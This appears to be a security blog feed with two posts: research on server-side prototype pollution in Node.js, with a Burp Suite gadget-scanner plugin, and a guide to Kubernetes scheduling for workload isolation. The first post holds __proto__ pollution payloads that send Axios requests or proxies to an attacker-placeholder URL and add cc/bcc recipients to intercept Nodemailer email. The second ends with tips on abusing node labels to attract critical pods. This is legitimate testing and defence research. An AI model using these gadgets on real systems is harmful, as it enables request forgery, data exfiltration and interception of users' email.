To fully understand the exploitation of this vulnerability, it’s crucial to know what “sources” and “gadgets” are.

  • Sources: A source in the context of prototype pollution refers to a piece of code that performs a recursive assignment without properly validating the objects involved. This action creates a pathway for attackers to modify the prototype of an object. The main sources of prototype pollution are:
    • Custom Code: This includes code written by developers that does not adequately check or sanitize user input before processing it. Such code can directly introduce vulnerabilities into an application.
    • Vulnerable Libraries: External libraries that contain vulnerabilities can also lead to prototype pollution. This often happens through recursive assignments that fail to validate the safety of the objects being merged or extended.
// Example of recursive assignment leading to prototype pollution
function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            if (!target[key]) target[key] = {};
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}
  • Gadgets: Gadgets refer to methods or pieces of code that exploit the prototype pollution vulnerability to achieve an attack. By manipulating the prototype of a base object, attackers can alter the application’s logic, gain unauthorized access, or execute arbitrary code, depending on the application’s structure and the nature of the polluted prototype.

State of the Art

Before diving into the specifics of our research, it’s crucial to understand the landscape of existing research on prototype pollution. This will help us identify the gaps in current methodologies and tools, and how our work aims to address them.

On the client side, there is a wealth of research and tools available. For sources, an excellent starting point is the compilation found on GitHub (client-side prototype pollution sources). As for gadgets, detailed exploration and exploitation techniques have been documented in various write-ups, such as this informative piece on InfoSec Writeups and PortSwigger’s own guide on client-side prototype pollution.

Additionally, there are tools designed to detect and exploit this vulnerability in an automated manner, both from the command line and within the browser. These include the PP-Finder CLI tool and DOM Invader, a feature of Burp Suite designed to uncover client-side prototype pollution.

However, the research and tooling landscape for server-side prototype pollution presents a different picture:

  • PortSwigger’s research provides a foundational understanding of server-side prototype pollution with various detection methodologies. However, a significant limitation is that some of these detection methods have become obsolete over time. More importantly, while it excels in identifying vulnerabilities, it does not extend to facilitating their real-world exploitation using gadgets. This gap indicates a need for tools that not only detect but also enable the practical exploitation of identified vulnerabilities.

  • On the other hand, YesWeHack’s guide introduces several intriguing gadgets, some of which have been incorporated into our plugin (below). Despite this valuable contribution, the guide occasionally ventures into hypothetical scenarios that may not always align with realistic application contexts. Moreover, it falls short of providing an automated approach for discovering gadgets in a black-box testing environment. This is crucial for comprehensive vulnerability assessments and exploitation in real-world settings.

This overview underscores the need for further innovation in server-side prototype pollution research, specifically in developing tools that not only detect but also exploit this vulnerability in a practical, automated manner.

About the Plugin

Following the insights previously discussed, we’ve developed a Burp Suite plugin for detecting gadgets in server-side prototype pollution: the Server-Side Prototype Pollution Gadgets Scanner, available at GitHub. This tool represents a novel approach in the realm of web security, focusing on the precise identification and exploitation of prototype pollution vulnerabilities.

The core functionality of this plugin is to take a JSON object from a request and systematically attempt to poison all possible fields with a predefined set of gadgets. For example, given a JSON object:

{
  "user": "example",
  "auth": false
}

The plugin would attempt various poisonings, such as:

{
  "user": {"__proto__": <polluted_object>},
  "auth": false
}

or:

{
  "user": "example",
  "auth": {"__proto__": <polluted_object>}
}

Our decision to create a new plugin, rather than relying solely on custom checks (bchecks) or the existing server-side prototype pollution scanner highlighted in PortSwigger’s blog, was driven by a practical necessity. These tools, while powerful in their detection capabilities, do not automatically revert the modifications made during the detection process. Given that some gadgets could adversely affect the system or alter application behavior, our plugin specifically addresses this issue by carefully removing the poisonings after their detection. This step is crucial to ensure that the exploitation process does not compromise the application’s functionality or stability. By taking this approach, we aim to provide a tool that not only identifies vulnerabilities but also maintains the integrity of the application by preventing potential disruptions caused by the exploitation activities.

Furthermore, all gadgets introduced by the plugin operate out-of-bounds (OOB). This design choice stems from the understanding that the source of pollution might be entirely separate from where a gadget is triggered within the application’s codebase. Therefore, the exploitation occurs asynchronously, relying on OOB techniques that wait for interaction. This method ensures that even if the polluted property is not immediately used, it can still be exploited, once the application interacts with the poisoned prototype. This showcases the versatility and depth of our scanning approach.

Plugin Screenshot

Methodology for Finding Gadgets

To discover gadgets capable of altering an application’s behavior, our approach involved a thorough examination of the documentation for common Node.js libraries. We focused on identifying optional parameters within these libraries that, when modified, could introduce security vulnerabilities or lead to unintended application behaviors. Part of our methodology also includes defining a standard format for describing each gadget within our plugin:

{
"payload": {"<parameter>": "<URL>"},
"description": "<Description>",
"null_payload": {"<parameter>": {}}
}
  • Payload: Represents the actual payload used to exploit the vulnerability. The <URL> placeholder is where the URL of the collaborator is inserted.
  • Description: Provides a brief explanation of what the gadget does or what vulnerability it exploits.
  • Null_payload: Specifies the payload that should be used to revert the changes made by the payload, effectively “de-poisoning” the application to prevent any unintended behavior.

This format ensures a consistent and clear way to document and share gadgets among the security community, facilitating the identification, testing, and mitigation of prototype pollution vulnerabilities.

Axios Library

Axios is widely used for making HTTP requests. By examining the Axios documentation and request configuration options, we identified that certain parameters, such as baseURL and proxy, can be exploited for malicious purposes.

  • Vulnerable Code Example:
    app.get("/get-api-key", async (req, res) => {
      try {
          const instance = axios.create({baseURL: "https://doyensec.com"});
          const response = await instance.get("/?api-key=<API_KEY>");
      }
    });
    
  • Gadget Explanation: Manipulating the baseURL parameter allows for the redirection of HTTP requests to a domain controlled by an attacker, potentially facilitating Server-Side Request Forgery (SSRF) or data exfiltration. For the proxy parameter, the key to exploitation lies in the ability to suggest that outgoing HTTP requests could be rerouted through an attacker-controlled proxy. While Burp Collaborator itself does not support acting as a proxy to directly capture or manipulate these requests, the subtle fact that it can detect DNS lookups initiated by the application is crucial. The ability to observe the DNS requests to domains we control, triggered by poisoning the proxy configuration, indicates the application’s acceptance of this poisoned configuration. It highlights the potential vulnerability without the need to directly observe proxy traffic. This insight allows us to infer that with the correct setup (outside of Burp Collaborator), an actual proxy could be deployed to intercept and manipulate HTTP communications fully, demonstrating the vulnerability’s potential exploitability.

  • Gadget for Axios:
    {
      "payload": {"baseURL": "https://<URL>"},
      "description": "Modifies 'baseURL', leading to SSRF or sensitive data exposure in libraries like Axios.",
      "null_payload": {"baseURL": {}}
    },
    {
      "payload": {"proxy": {"protocol": "http", "host": "<URL>", "port": 80}},
      "description": "Sets a proxy to manipulate or intercept HTTP requests, potentially revealing sensitive info.",
      "null_payload": {"proxy": {}}
    }
    

Nodemailer Library

Nodemailer is another library we explored and is primarily used for sending emails. The Nodemailer documentation reveals that parameters like cc and bcc can be exploited to intercept email communications.

  • Vulnerable Code Example:
    transporter.sendMail(mailOptions, (error, info) => {
      if (error) {
          res.status(500).send('500!');
      } else {
          res.send('200 OK');
      }
    });
    
  • Gadget Explanation: By adding ourselves as a cc or bcc recipient in the email configuration, we can potentially intercept all emails sent by the platform, gaining access to sensitive information or communication.

  • Gadget for Nodemailer:
    {
      "payload": {"cc": "email@<URL>"},
      "description": "Adds a CC address in email libraries, potentially intercepting all platform emails.",
      "null_payload": {"cc": {}}
    },
    {
      "payload": {"bcc": "email@<URL>"},
      "description": "Adds a BCC address in email libraries, similar to 'cc', for intercepting emails.",
      "null_payload": {"bcc": {}}
    }
    

Gadget Found

Our methodology emphasizes the importance of understanding library documentation and how optional parameters can be leveraged maliciously. We encourage the community to contribute by identifying and sharing new gadgets. Visit our GitHub repository for a comprehensive installation guide and to start using the tool.

Kubernetes Scheduling And Secure Design

17 January 2024 at 23:00

During testing activities, we usually analyze the design choices and context needs in order to suggest applicable remediations depending on the different Kubernetes deployment patterns.

Scheduling is often overlooked in Kubernetes designs. Typically, various mechanisms take precedence, including, but not limited to, Admission Controllers, Network Policies, and RBAC configurations.

Nevertheless, a compromised pod could allow attackers to move laterally to other tenants running on the same Kubernetes node. Pod-escaping techniques or shared storage systems could be exploitable to achieve cross-tenant access despite the other security measures.

Having a security-oriented scheduling strategy can help to reduce the overall risk of workload compromise in a comprehensive security design. If critical workloads are separated at the scheduling decision, the blast radius of a compromised pod is reduced.

By doing so, lateral movements related to the shared node, from low-risk tasks to business-critical workloads, are prevented.

CloudsecTidbit
Attackers on a compromised Pod with nothing around

Kubernetes provides multiple mechanisms to achieve isolation-oriented designs like node tainting or affinity. Below, we describe the scheduling mechanisms offered by Kubernetes and highlight how they contribute to actionable risk reduction.

The following methods to apply a scheduling strategy will be discussed:

Mechanisms For Workloads Separation

As mentioned earlier, isolating tenant workloads from each other helps in reducing the impact of a compromised neighbor. That happens because all pods running on a certain node will belong to a single tenant. Consequently, an attacker capable of escaping from a container will only have access to the containers and the volumes mounted to that node.

Additionally, multiple applications with different authorization may lead to privileged pods sharing the node with pods having PII data mounted or different security risk level.

1. nodeSelector

Among the constraints, it is the simplest one operating by just specifying the target node labels inside the pod specification.

Example Pod Spec

apiVersion: v1
kind: Pod
metadata:
  name: nodeSelector-pod
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeSelector:
    myLabel: myvalue

If multiple labels are specified, they are treated as required (AND logic), hence scheduling will happen only on pods respecting all of them.

While it is very useful in low-complexity environments, it could easily become a bottleneck stopping executions if many selectors are specified and not satisfied by nodes.

Consequently, it requires good monitoring and dynamic management of the labels assigned to nodes if many constraints need to be applied.

2. nodeName

If the nodeName field in the Spec is set, the kube scheduler simply passes the Pod to the kubelet, which then attempts to assign the Pod to the specified node.

In that sense, nodeName overwrites other scheduling rules (e.g. nodeSelector,affinity, anti-affinity etc.) since the scheduling decision is pre-defined.

Example Pod Spec

apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeName: node-critical-workload

Limitations:

  • The Pod will not run if the node in the spec is not running or if it is out of resources to host it
  • Cloud environments like AWS EKS come with non predictable node names

Consequently, it requires a detailed management of the available nodes and allocated resources for each group of workloads since the scheduling is pre-defined.

Note: De-facto such approach invalidates all the computational efficiency benefits of the scheduler and it should be only applied on small groups of critical workloads easy to manage.

3. Affinity & Anti-affinity

The NodeAffinity feature enables the possibility to specify rules for pod scheduling based on some characteristics or labels of nodes. They can be used to ensure that pods are scheduled onto nodes meeting specific requirements (affinity rules) or to avoid scheduling pods in specific environments (anti-affinity rules).

Affinity and anti-affinity rules can be set as either “preferred” (soft) or “required” (hard): If it’s set as preferredDuringSchedulingIgnoredDuringExecution, this indicates a soft rule. The scheduler will try to adhere to this rule but may not always do so, especially if adhering to the rule would make scheduling impossible or challenging. If it’s set as requiredDuringSchedulingIgnoredDuringExecution, it’s a hard rule. The scheduler will not schedule the pod unless the condition is met. This can lead to a pod remaining unscheduled (pending) if the condition isn’t met.

In particular, anti-affinity rules could be leveraged to protect critical workloads from sharing the Kubelet with non-critical ones. By doing so, the lack of computational optimization will not affect the entire node pool, but just a few instances that will contain business-critical units.

Example of node affinity

apiVersion: v1
kind: Pod
metadata:
  name: node-affinity-example
spec:
  affinity:
   nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
       - weight: 1
         preference:
          matchExpressions:
          - key: net-segment
            operator: In
            values:
            -  segment-x
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: workloadtype
            operator: In
            values:
            - p0wload
            - p1wload
  containers:
  - name: node-affinity-example
    image: registry.k8s.io/pause:2.0

The node is preferred to be in a specific network segment by label and it is required to match either p0 or p1 workloadtype (custom strategy).

Multiple operators are available (https://kubernetes.io/docs/concepts/scheduling-eviction/assign-pod-node/#operators) and NotIn and DoesNotExist are the specific ones usable to obtain node anti-affinity.

From a security standpoint, only hard rules requiring the conditions to be respected matter. preferredDuringSchedulingIgnoredDuringExecution should be used for computational configurations that can not affect the security posture of the cluster.

4. Inter-pod affinity and anti-affinity

Inter-pod affinity and anti-affinity could constrain which nodes the pods can be scheduled on based on the labels of pods already running on that node.
As specified in Kubernetes documentation:

“Inter-pod affinity and anti-affinity rules take the form “this Pod should (or, in the case of anti-affinity, should not) run in an X if that X is already running one or more Pods that meet rule Y”, where X is a topology domain like node, rack, cloud provider zone or region, or similar and Y is the rule Kubernetes tries to satisfy.”

Example of anti-affinity

affinity:
  podAntiAffinity:
    requiredDuringSchedulingIgnoredDuringExecution:
    - labelSelector:
        matchExpressions:
        - key: app
          operator: In
          values:
          - testdatabase

In the podAntiAffinity case above, we will never see the pod running on a node where a testdatabase app is running.

It fits designs where it is desired to schedule some pods together or where the system must ensure that certain pods are never going to be scheduled together.

In particular, the inter-pod rules allow engineers to define additional constraints within the same execution context without further creating segmentation in terms of node groups. Nevertheless, complex affinity rules could create situations with pods stuck in pending status.

5. Taints and Tolerations

Taints are the opposite of node affinity properties since they allow a node to repel a set of pods not matching some tolerations.

Taints can be applied to a node to make it repel pods unless they explicitly tolerate the taints.

Tolerations are applied to pods. Tolerations allow the scheduler to schedule pods with matching taints. It should be highlighted that while tolerations allow scheduling, the decision is not guaranteed.

Each node also defines an action linked to each taint: NoExecute (affects running pods), NoSchedule (hard rule), PreferNoSchedule (soft rule).

The approach is ideal for environments where strong isolation of workloads is required. Moreover, it allows the creation of custom node selection rules not based solely on labels and it does not leave flexibility.

6. Pod topology spread constraints

You can use topology spread constraints to control how Pods are spread across your cluster among failure-domains such as regions, zones, nodes, and other user-defined topology domains. This can help to achieve high availability as well as efficient resource utilization.

7. Not satisfied? Custom Scheduler To The Rescue

Kubernetes by default uses the kube-scheduler which follows its own set of criteria for scheduling pods. While the default scheduler is versatile and offers a lot of options, there might be specific security requirements that the default scheduler might not know about. Writing a custom scheduler allows an organization to apply a risk-based scheduling to avoid pairing privileged pods with pods processing or accessing sensitive data.

To create a custom scheduler, you would typically write a program that:

  • Watches for unscheduled pods
  • Implements a scheduling algorithm to decide on which node the pod should run
  • Communicates the decision to the Kubernetes API server.

Some examples of a custom scheduler that can be adapted for this can be found at the following GH repositories: kubernetes-sigs/scheduler-plugins or onuryilmaz/k8s-scheduler-example.
Additionally, a good presentation on crafting your own is Building a Kubernetes Scheduler using Custom Metrics - Mateo Burillo, Sysdig. As mentioned in the talk, this is not for the faint of heart because of the complexity and you might be better off just sticking with the default one if you are not already planning to build one.

Offensive Tips: Scheduling policies are like magnets

As described, scheduling policies could be used to attract or repel pods into specific group of nodes.

As previously stated, a proper strategy reduces the blast radius of a compromised pod. Nevertheless, there are still some aspects to take care about from the attacker perspective.

In specific cases, the implemented mechanisms could be used either to:

  • Attract critical pods - A compromised node or role able to edit the metadata could be abused to attract pods interesting for the attacker by manipulating the labels of a controlled node.
    • Carefully review roles and internal processes that could be abused to edit the metadata. Verify the possibility for internal threats to exploit the attraction by influencing or changing the labels and taints
  • Avoid rejection on critical nodes - If users are supposed to submit pod specs or have indirect control over how they are dynamically structured could be abused with scheduling sections. An attacker able to submit Pod Specs could use scheduling preferences to jump to a critical node.
    • Always review the scheduling strategy to find out the options allowing pods to land on nodes hosting critical workloads. Verify if the user-controlled flows allow adding them or if the logic could be abused by some internal flow
  • Prevent other workloads from being scheduled - In some cases, knowing or reversing the applied stategy could allow a privileged attacker to craft pods to block legit workloads at the scheduling decision.
    • Look for potential mix of labels usable to lock the scheduling on a node

Bonus Section: Node labels security
Normally, the kubelet will still be able to modify labels for a node, potentially allowing a compromised node to tamper its own labels to trick the scheduler as described above.

A security measure could be applied with the NodeRestriction admission plugin. It basically denies labels editing from the kubelet if the following prefix is present in the label.

Wrap-up: Time to take the scheduling decision

Security-wise, dedicated nodes for each namespace/service would constitute the best setup. However, the design would not exploit the kubernetes capability to optimize computations.

The following examples represent some trade-off choices:

  • Isolate critical namespaces/workloads on their own node group
  • Reserve a node for critical pods of each namespace
  • Deploy a completely independent cluster for critical namespaces

The core concept for a successful approach is having a set of reserved nodes for critical namespaces/workloads.

Real world scenarios and complex designs require engineers to plan the fitting mix of mechanisms according to performance requirements and risk tolerance.

This decision starts with defining the workloads’ risk:

  • Different teams, different trust level
    It’s not uncommon for large organizations to have multiple teams deploying to the same cluster. Different teams might have different levels of trustworthiness, training or access. This diversity can introduce varying levels of risks.

  • Data being processed or stored
    Some pods may require mounting customer data or having persistent secrets to perform tasks. Sharing the node with any workload with less hardened workloads may expose the data to a risk

  • Exposed network services on the same node
    Any pod that exposes a network service increases its attack surface. Pods interacting with external-facing requests may suffer from this exposure and be more at risk of compromise.

  • Pod privileges and capabilities, or its assigned risk
    Some workloads may need some privileges to work or may run code that by its own nature process potentially unsafe content or third-party vendor code. All these factors can contribute to increase a workload’s assigned risk.

Once found the set of risks within the environment, decide the isolation level for teams/data/network traffic/capabilities. Grouping them if they are part of the same process could do the trick.

At that point, the amount of workloads in each isolation group should be evaluable and ready to be addressed by mixing the scheduling strategies according to the size and complexity of each group.

Note: Simple environments should use simple strategies and avoid mixing too many mechanisms if few isolation groups and constraints are present.

❌
❌